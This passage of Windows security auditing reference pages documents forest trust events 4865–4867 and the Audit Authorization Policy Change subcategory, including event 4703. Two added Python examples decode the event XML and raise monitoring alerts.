<Data Name="EntryType">2</Data>
<Data Name="Flags">0</Data>
<Data Name="TopLevelName">-</Data>
<Data Name="DnsName">Fabrikam.local</Data>
<Data Name="NetbiosName">FABRIKAM</Data>
<Data Name="DomainSid">S-1-5-21-2703072690-1374247579-2643703677</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x138eb0</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “add a trusted forest information entry” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “add a trusted forest
information entry” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Trust Information:
Forest Root [Type = UnicodeString]: the name of the Active Directory forest for which trusted forest
information entry was added.
Forest Root SID [Type = SID]: the SID of the Active Directory forest for which trusted forest information entry was added. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
Operation ID [Type = HexInt64]: unique hexadecimal identifier of the operation. You can correlate this event with other events (4866(S): A trusted forest information entry was removed, 4867(S): A trusted forest information entry was modified.) using this field.
Entry Type [Type = UInt32]: the type of added entry:

VALUE  TYPE NAME  DESCRIPTION
0 ForestTrustTopLevelName: The DNS name of the trusted forest. The structure used for this record type is equivalent to LSA_UNICODE_STRING.
1 ForestTrustTopLevelNameEx: This type is commonly used for name suffix exceptions. The structure used for this record type is equivalent to LSA_UNICODE_STRING.
2 ForestTrustDomainInfo: This field specifies a record containing identification and name information.

Flags [Type = UInt32]: The following table specifies the possible flags.
Some flag values are reused for different forest record types. See the “Meaning” column for more
information.

VALUE  TRUST TYPE  MEANING
0 (-): No flags were set.
1 ForestTrustTopLevelNameEx, ForestTrustTopLevelName: The top-level name trust record is disabled during initial creation.
1 ForestTrustDomainInfo: The domain information trust record is disabled by the domain administrator.
2 ForestTrustTopLevelNameEx, ForestTrustTopLevelName: The top-level name trust record is disabled by the domain administrator.
2 ForestTrustDomainInfo: The domain information trust record is disabled due to a conflict.
4 ForestTrustTopLevelNameEx, ForestTrustTopLevelName: The top-level name trust record is disabled due to a conflict.
4 ForestTrustDomainInfo: The domain information trust record is disabled by the domain administrator.
8 ForestTrustDomainInfo: The domain information trust record is disabled due to a conflict.

Top Level Name [Type = UnicodeString]: the name of the new trusted forest information entry.
DNS Name [Type = UnicodeString]: DNS name of the trust partner. This parameter might not be captured
in the event, and in that case appears as “-”.
NetBIOS Name [Type = UnicodeString]: NetBIOS name of the trust partner. This parameter might not be
captured in the event, and in that case appears as “-”.
Domain SID [Type = SID]: SID of the trust partner. This parameter might not be captured in the event, and in that case appears as “NULL SID”.

Security Monitoring Recommendations
For 4865(S): A trusted forest information entry was added.
Any changes related to Active Directory forest trusts (especially creation of the new trust) must be monitored and alerts should be triggered. If this change was not planned, investigate the reason for the change.
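Added example, not part of the reference: a Python decoder for the forest trust information events 4865 (added), 4866 (removed) and 4867 (modified) that maps Entry Type and Flags to the meanings in the tables above (a flag's meaning depends on the record type) and groups events by Operation ID, which the reference says correlates the three events. The 4865 sample reuses the values from the reference's Event XML; the 4867 sample carrying flag 4 on a top-level name record is constructed.

```python
"""Decoder for Windows Security events 4865/4866/4867 (trusted forest
information entry added/removed/modified).

Added example (not from the reference). Entry types, flag meanings and
field names are taken from the 4865 field descriptions.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

ENTRY_TYPES = {
    0: "ForestTrustTopLevelName",
    1: "ForestTrustTopLevelNameEx",
    2: "ForestTrustDomainInfo",
}
EVENT_ACTIONS = {4865: "added", 4866: "removed", 4867: "modified"}

# Flag meanings from the reference, keyed by flag value, then by entry type.
# TopLevelName and TopLevelNameEx share the same meanings.
_TLN = ("ForestTrustTopLevelName", "ForestTrustTopLevelNameEx")
FLAG_MEANINGS = {
    1: {**dict.fromkeys(_TLN, "top-level name record disabled during initial creation"),
        "ForestTrustDomainInfo": "domain information record disabled by the domain administrator"},
    2: {**dict.fromkeys(_TLN, "top-level name record disabled by the domain administrator"),
        "ForestTrustDomainInfo": "domain information record disabled due to a conflict"},
    4: {**dict.fromkeys(_TLN, "top-level name record disabled due to a conflict"),
        "ForestTrustDomainInfo": "domain information record disabled by the domain administrator"},
    8: {"ForestTrustDomainInfo": "domain information record disabled due to a conflict"},
}


def parse_event(xml_text):
    """Return (EventID, {Data@Name: text}) for one Event element."""
    root = ET.fromstring(xml_text)
    eid = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}
    return eid, data


def decode_flags(flags, entry_type_name):
    """Meaning of each set bit for this record type; 0 decodes to an empty list."""
    meanings = []
    for bit in sorted(FLAG_MEANINGS):
        if flags & bit:
            meaning = FLAG_MEANINGS[bit].get(entry_type_name)
            meanings.append(meaning or f"flag {bit} has no documented meaning for {entry_type_name}")
    return meanings


def decode_trust_event(xml_text):
    eid, data = parse_event(xml_text)
    if eid not in EVENT_ACTIONS:
        raise ValueError(f"event {eid} is not a forest trust information event")
    entry_type = ENTRY_TYPES.get(int(data["EntryType"]), f"unknown({data['EntryType']})")
    return {
        "event_id": eid,
        "action": EVENT_ACTIONS[eid],
        "operation_id": data["OperationId"],
        "forest_root": data["ForestRoot"],
        "entry_type": entry_type,
        "flags": decode_flags(int(data["Flags"]), entry_type),
        "dns_name": data["DnsName"],
        "netbios_name": data["NetbiosName"],
        "subject": f'{data["SubjectDomainName"]}\\{data["SubjectUserName"]}',
        "subject_sid": data["SubjectUserSid"],
        # The reference says any forest trust change must raise an alert.
        "alert": True,
    }


def group_by_operation(events):
    """Correlate decoded events that share an Operation ID."""
    groups = defaultdict(list)
    for ev in events:
        groups[ev["operation_id"]].append(ev)
    return dict(groups)


def sample_event(event_id, entry_type, flags, top_level_name="-"):
    """Constructed Event XML using the reference's 4865 example values."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>{event_id}</EventID>
<Computer>DC01.contoso.local</Computer></System>
<EventData><Data Name="ForestRoot">Fabrikam.local</Data>
<Data Name="ForestRootSid">S-1-5-21-2703072690-1374247579-2643703677</Data>
<Data Name="OperationId">0x648620</Data>
<Data Name="EntryType">{entry_type}</Data><Data Name="Flags">{flags}</Data>
<Data Name="TopLevelName">{top_level_name}</Data>
<Data Name="DnsName">Fabrikam.local</Data><Data Name="NetbiosName">FABRIKAM</Data>
<Data Name="DomainSid">S-1-5-21-2703072690-1374247579-2643703677</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data><Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x138eb0</Data></EventData></Event>"""


# 4865 from the reference (domain info record, no flags) plus a constructed
# 4867 for the same operation: a top-level name record disabled due to a conflict.
PAGE_EVENT = sample_event(4865, 2, 0)
CONFLICT_EVENT = sample_event(4867, 0, 4, top_level_name="fabrikam.local")

if __name__ == "__main__":
    decoded = [decode_trust_event(e) for e in (PAGE_EVENT, CONFLICT_EVENT)]
    for op, evs in group_by_operation(decoded).items():
        print(op, [(e["event_id"], e["entry_type"], e["flags"]) for e in evs])
```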
4866(S): A trusted forest information entry was removed.
4/5/2019 • 4 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authentication Policy Change
Event Description:
This event generates when a trusted forest information entry was removed.
This event is generated only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4865</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-02T03:11:33.397715700Z" />
<EventRecordID>1049810</EventRecordID>
<Correlation />
<Execution ProcessID="500" ThreadID="4808" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="ForestRoot">Fabrikam.local</Data>
<Data Name="ForestRootSid">S-1-5-21-2703072690-1374247579-2643703677</Data>
<Data Name="OperationId">0x648620</Data>
<Data Name="EntryType">2</Data>
<Data Name="Flags">0</Data>
<Data Name="TopLevelName">-</Data>
<Data Name="DnsName">Fabrikam.local</Data>
<Data Name="NetbiosName">FABRIKAM</Data>
<Data Name="DomainSid">S-1-5-21-2703072690-1374247579-2643703677</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x138eb0</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “remove a trusted forest information entry” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “remove a trusted
forest information entry” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Trust Information:
Forest Root [Type = UnicodeString]: the name of the Active Directory forest for which trusted forest
information entry was removed.
Forest Root SID [Type = SID ]: the SID of the Active Directory forest for which trusted forest information entry
was removed. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot
be resolved, you will see the source data in the event.
Operation ID [Type = HexInt64]: unique hexadecimal identifier of the operation. You can correlate this event
with other events (4865(S ): A trusted forest information entry was added, 4867(S ): A trusted forest information
entry was modified.) using this field.
Entry Type [Type = UInt32]: the type of removed entry:

VALUE | TYPE NAME | DESCRIPTION
0 | ForestTrustTopLevelName | The DNS name of the trusted forest. The structure used for this record type is equivalent to LSA_UNICODE_STRING.
1 | ForestTrustTopLevelNameEx | This type is commonly used for name suffix exceptions. The structure used for this record type is equivalent to LSA_UNICODE_STRING.
2 | ForestTrustDomainInfo | This field specifies a record containing identification and name information.
Flags [Type = UInt32]: The following table specifies the possible flags. Some flag values are reused for different forest record types. See the “Meaning” column for more information.

VALUE | TRUST TYPE | MEANING
0 | - | No flags were set.
1 | ForestTrustTopLevelNameEx, ForestTrustTopLevelName | The top-level name trust record is disabled during initial creation.
1 | ForestTrustDomainInfo | The domain information trust record is disabled by the domain administrator.
2 | ForestTrustTopLevelNameEx, ForestTrustTopLevelName | The top-level name trust record is disabled by the domain administrator.
2 | ForestTrustDomainInfo | The domain information trust record is disabled due to a conflict.
4 | ForestTrustTopLevelNameEx, ForestTrustTopLevelName | The top-level name trust record is disabled due to a conflict.
4 | ForestTrustDomainInfo | The domain information trust record is disabled by the domain administrator.
8 | ForestTrustDomainInfo | The domain information trust record is disabled due to a conflict.
Top Level Name [Type = UnicodeString]: the name of the removed trusted forest information entry.
DNS Name [Type = UnicodeString]: DNS name of the trust partner. This parameter might not be captured in the event, and in that case appears as “-”.
NetBIOS Name [Type = UnicodeString]: NetBIOS name of the trust partner. This parameter might not be captured in the event, and in that case appears as “-”.
Domain SID [Type = SID]: SID of the trust partner. This parameter might not be captured in the event, and in that case appears as “NULL SID”.

Security Monitoring Recommendations
For 4866(S): A trusted forest information entry was removed.
Any changes related to Active Directory forest trusts (especially trust removal) must be monitored and alerts should be triggered. If this change was not planned, investigate the reason for the change.
4867(S): A trusted forest information entry was modified.
4/5/2019 • 4 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authentication Policy Change
Event Description:
This event generates when a trusted forest information entry was modified.
This event is generated only on domain controllers.
This event contains new values only; it doesn’t contain old values and it doesn’t show you which trust attributes were modified.

Note For recommendations, see Security Monitoring Recommendations for this event.
Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4865</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-02T03:11:33.397715700Z" />
<EventRecordID>1049810</EventRecordID>
<Correlation />
<Execution ProcessID="500" ThreadID="4808" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="ForestRoot">Fabrikam.local</Data>
<Data Name="ForestRootSid">S-1-5-21-2703072690-1374247579-2643703677</Data>
<Data Name="OperationId">0x648620</Data>
<Data Name="EntryType">2</Data>
<Data Name="Flags">0</Data>
<Data Name="TopLevelName">-</Data>
<Data Name="DnsName">Fabrikam.local</Data>
<Data Name="NetbiosName">FABRIKAM</Data>
<Data Name="DomainSid">S-1-5-21-2703072690-1374247579-2643703677</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x138eb0</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “modify/change a trusted forest information entry” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “modify/change a trusted forest information entry” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Trust Information:
Forest Root [Type = UnicodeString]: the name of the Active Directory forest for which trusted forest information entry was modified.
Forest Root SID [Type = SID]: the SID of the Active Directory forest for which trusted forest information entry was modified. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
Operation ID [Type = HexInt64]: unique hexadecimal identifier of the operation. You can correlate this event with other events (4865(S): A trusted forest information entry was added, 4866(S): A trusted forest information entry was removed) using this field.
Entry Type [Type = UInt32]: the type of modified entry:

VALUE | TYPE NAME | DESCRIPTION
0 | ForestTrustTopLevelName | The DNS name of the trusted forest. The structure used for this record type is equivalent to LSA_UNICODE_STRING.
1 | ForestTrustTopLevelNameEx | This type is commonly used for name suffix exceptions. The structure used for this record type is equivalent to LSA_UNICODE_STRING.
2 | ForestTrustDomainInfo | This field specifies a record containing identification and name information.
Flags [Type = UInt32]: The following table specifies the possible flags. Some flag values are reused for different forest record types. See the “Meaning” column for more information.

VALUE | TRUST TYPE | MEANING
0 | - | No flags were set.
1 | ForestTrustTopLevelNameEx, ForestTrustTopLevelName | The top-level name trust record is disabled during initial creation.
1 | ForestTrustDomainInfo | The domain information trust record is disabled by the domain administrator.
2 | ForestTrustTopLevelNameEx, ForestTrustTopLevelName | The top-level name trust record is disabled by the domain administrator.
2 | ForestTrustDomainInfo | The domain information trust record is disabled due to a conflict.
4 | ForestTrustTopLevelNameEx, ForestTrustTopLevelName | The top-level name trust record is disabled due to a conflict.
4 | ForestTrustDomainInfo | The domain information trust record is disabled by the domain administrator.
8 | ForestTrustDomainInfo | The domain information trust record is disabled due to a conflict.
Top Level Name [Type = UnicodeString]: the name of the modified trusted forest information entry.
DNS Name [Type = UnicodeString]: DNS name of the trust partner. This parameter might not be captured in the event, and in that case appears as “-”.
NetBIOS Name [Type = UnicodeString]: NetBIOS name of the trust partner. This parameter might not be captured in the event, and in that case appears as “-”.
Domain SID [Type = SID]: SID of the trust partner. This parameter might not be captured in the event, and in that case appears as “NULL SID”.

Security Monitoring Recommendations
For 4867(S): A trusted forest information entry was modified.
Any changes in Active Directory forest trust settings must be monitored and alerts should be triggered. If this change was not planned, investigate the reason for the change.
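As an added example (not code from the Microsoft documentation), the following Python parses a trusted forest information entry event (4865, 4866 or 4867), decodes Entry Type and Flags with the tables above (Flags bit values are reused across record types, so the Entry Type selects the meaning), and produces an alert record for every trust change, as the recommendation asks. The sample event is constructed test data modelled on the page's Event XML, and the function names are the author's own assumptions.

```python
import xml.etree.ElementTree as ET

# Namespace of the Windows event XML schema, as in the page's Event XML samples.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# The three trusted forest information entry events described on the page.
TRUST_EVENTS = {4865: "added", 4866: "removed", 4867: "modified"}

# Entry Type values from the page's table.
ENTRY_TYPES = {
    0: "ForestTrustTopLevelName",
    1: "ForestTrustTopLevelNameEx",
    2: "ForestTrustDomainInfo",
}

# Flag meanings from the page's Flags table. The same bit values are reused
# for different record types, so the Entry Type selects the right table.
TLN_FLAGS = {  # ForestTrustTopLevelName and ForestTrustTopLevelNameEx
    1: "The top-level name trust record is disabled during initial creation.",
    2: "The top-level name trust record is disabled by the domain administrator.",
    4: "The top-level name trust record is disabled due to a conflict.",
}
DOMAIN_INFO_FLAGS = {  # ForestTrustDomainInfo
    1: "The domain information trust record is disabled by the domain administrator.",
    2: "The domain information trust record is disabled due to a conflict.",
    4: "The domain information trust record is disabled by the domain administrator.",
    8: "The domain information trust record is disabled due to a conflict.",
}


def parse_event(xml_text):
    """Return (EventID, {Data Name: value}) from one Windows security event XML."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, data


def decode_flags(entry_type, flags):
    """Translate the Flags bit mask into the page's meanings for this Entry Type."""
    if flags == 0:
        return ["No flags were set."]
    table = DOMAIN_INFO_FLAGS if entry_type == 2 else TLN_FLAGS
    meanings, known = [], 0
    for bit, meaning in table.items():
        if flags & bit:
            known |= bit
            if meaning not in meanings:  # bits 1 and 4 share a meaning for DomainInfo
                meanings.append(meaning)
    if flags & ~known:
        meanings.append(f"unknown flag bits 0x{flags & ~known:x}")
    return meanings


def trust_change_alert(xml_text):
    """Build an alert record for 4865/4866/4867; return None for other events.

    The page recommends alerting on every forest trust change, so nothing is
    suppressed here; the record carries the fields an analyst needs to decide
    whether the change was planned.
    """
    event_id, d = parse_event(xml_text)
    if event_id not in TRUST_EVENTS:
        return None
    entry_type = int(d["EntryType"])
    alert = {
        "action": TRUST_EVENTS[event_id],
        "forest_root": d["ForestRoot"],
        "entry_type": ENTRY_TYPES.get(entry_type, f"unknown ({entry_type})"),
        "flags": decode_flags(entry_type, int(d["Flags"])),
        "partner": {"dns": d["DnsName"], "netbios": d["NetbiosName"], "sid": d["DomainSid"]},
        "subject": f'{d["SubjectDomainName"]}\\{d["SubjectUserName"]}',
        "logon_id": d["SubjectLogonId"],     # correlate with 4624 for the logon session
        "operation_id": d["OperationId"],    # correlate 4865/4866/4867 of one operation
    }
    if event_id == 4867:
        # 4867 carries the new values only; the previous values are not in the event.
        alert["note"] = "new values only, previous values not recorded"
    return alert


# Constructed sample modelled on the page's Event XML (values are test data).
SAMPLE_4866 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4866</EventID><Computer>DC01.contoso.local</Computer></System>
  <EventData>
    <Data Name="ForestRoot">Fabrikam.local</Data>
    <Data Name="ForestRootSid">S-1-5-21-2703072690-1374247579-2643703677</Data>
    <Data Name="OperationId">0x648620</Data>
    <Data Name="EntryType">2</Data>
    <Data Name="Flags">0</Data>
    <Data Name="TopLevelName">-</Data>
    <Data Name="DnsName">Fabrikam.local</Data>
    <Data Name="NetbiosName">FABRIKAM</Data>
    <Data Name="DomainSid">S-1-5-21-2703072690-1374247579-2643703677</Data>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x138eb0</Data>
  </EventData>
</Event>"""

if __name__ == "__main__":
    print(trust_change_alert(SAMPLE_4866))
```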
Audit Authorization Policy Change
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Authorization Policy Change allows you to audit assignment and removal of user rights in user right policies, changes in security token object permission, resource attribute changes, and Central Access Policy changes for file system objects.

COMPUTER TYPE | GENERAL SUCCESS | GENERAL FAILURE | STRONGER SUCCESS | STRONGER FAILURE | COMMENTS
Domain Controller | IF | No | IF | No | See the comment below (identical for all three computer types).
Member Server | IF | No | IF | No | See the comment below.
Workstation | IF | No | IF | No | See the comment below.

IF – With Success auditing for this subcategory, you can get information related to changes in user rights policies, or changes of resource attributes or Central Access Policy applied to file system objects. However, if you are using an application or system service that makes changes to system privileges through the AdjustPrivilegesToken API, we do not recommend Success auditing because of the high volume of event “4703(S): A user right was adjusted” that may be generated. As of Windows 10, event 4703 is generated by applications or services that dynamically adjust token privileges. An example of such an application is System Center Configuration Manager, which makes WMI queries at recurring intervals and quickly generates a large number of 4703 events (with the WMI activity listed as coming from svchost.exe). If one of your applications or services is generating a large number of 4703 events, you might find that your event-management software has filtering logic that can automatically discard the recurring events, which would make it easier to work with Success auditing for this category. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.

Events List:
4703(S): A user right was adjusted.
4704(S): A user right was assigned.
4705(S): A user right was removed.
4670(S): Permissions on an object were changed.
4911(S): Resource attributes of the object were changed.
4913(S): Central Access Policy on the object was changed.
Event volume: Medium to High.
4703(S): A user right was adjusted.
4/5/2019 • 15 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authorization Policy Change
Event Description:
This event generates when token privileges were enabled or disabled for a specific account’s token.
As of Windows 10, event 4703 is also logged by applications or services that dynamically adjust token privileges. An example of such an application is System Center Configuration Manager, which makes WMI queries at recurring intervals and quickly generates a large number of 4703 events (with the WMI activity listed as coming from svchost.exe). If you are using an application or system service that makes changes to system privileges through the AdjustPrivilegesToken API, you might need to disable Success auditing for this subcategory (Audit Authorization Policy Change), or work with a very high volume of event 4703.

Note For recommendations, see Security Monitoring Recommendations for this event.

Token privileges provide the ability to take certain system-level actions that you only need to do at particular moments. For example, anybody can restart a computer, but the operating system doesn’t enable that privilege by default. Instead, the privilege is enabled when you click Shutdown. You can check the current state of the user’s token privileges using the whoami /priv command:
Event XML:
Event XML:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4703</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13570</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-11-12T20:49:46.365958700Z" />
<EventRecordID>5245</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="3632" />
<Channel>Security</Channel>
<Computer>WIN-GG82ULGC9GO.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">WIN-GG82ULGC9GO$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="TargetUserSid">S-1-5-18</Data>
<Data Name="TargetUserName">WIN-GG82ULGC9GO$</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetLogonId">0x3e7</Data>
<Data Name="ProcessName">C:\Windows\System32\svchost.exe</Data>
<Data Name="ProcessId">0x270</Data>
<Data Name="EnabledPrivilegeList">SeAssignPrimaryTokenPrivilege SeIncreaseQuotaPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeSystemtimePrivilege SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege SeSystemEnvironmentPrivilege SeUndockPrivilege SeManageVolumePrivilege</Data>
<Data Name="DisabledPrivilegeList">-</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2016, Windows 10.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “enable” or “disable” operation for Target Account privileges. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “enable” or “disable” operation for Target Account privileges.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Target Account:
Security ID [Type = SID]: SID of account for which privileges were enabled or disabled. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account for which privileges were enabled or disabled.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that enabled or disabled token privileges. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):

If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Enabled Privileges [Type = UnicodeString]: the list of enabled user rights. This event generates only for user
rights, not logon rights. Here is the list of possible user rights:

PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeAssignPrimaryTokenPrivilege Replace a process-level token Required to assign the primary token


of a process.
With this privilege, the user can initiate
